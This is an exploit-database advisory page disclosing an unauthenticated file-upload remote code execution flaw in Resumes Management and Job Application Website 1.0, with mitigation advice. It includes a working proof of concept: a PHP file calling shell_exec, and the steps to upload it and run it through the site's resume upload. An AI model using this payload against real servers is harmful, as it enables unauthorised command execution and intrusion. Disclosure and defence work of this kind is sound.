header-logo
Suggest Exploit
vendor:
Resumes Management and Job Application Website
by:
Arnav Tripathy
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Resumes Management and Job Application Website
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux with LAMP stack
2021

Resumes Management and Job Application Website 1.0 – RCE (Unauthenticated)

The Resumes Management and Job Application Website 1.0 allows unauthenticated users to upload resume files. By uploading a PHP file with malicious code, an attacker can execute arbitrary commands on the server and gain unauthorized access. The provided exploit code uploads a PHP file named 'rce.php' containing a command to retrieve the current user's information using the 'whoami' command. When accessing the uploaded file through the URL, the output of the 'whoami' command is displayed.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and file type checking when accepting file uploads. Additionally, the web server should be configured to prevent the execution of uploaded PHP files.
Source

Exploit-DB raw data:

# Exploit Title: Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp

Submit rce.php in resume file upload unauthenticated.
Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>

Navigate to http://localhost/Resumes Management and Job Application
Website/files/rce.php

You will get the output of whoami

Navigation

Suggest Exploit

Services By CQR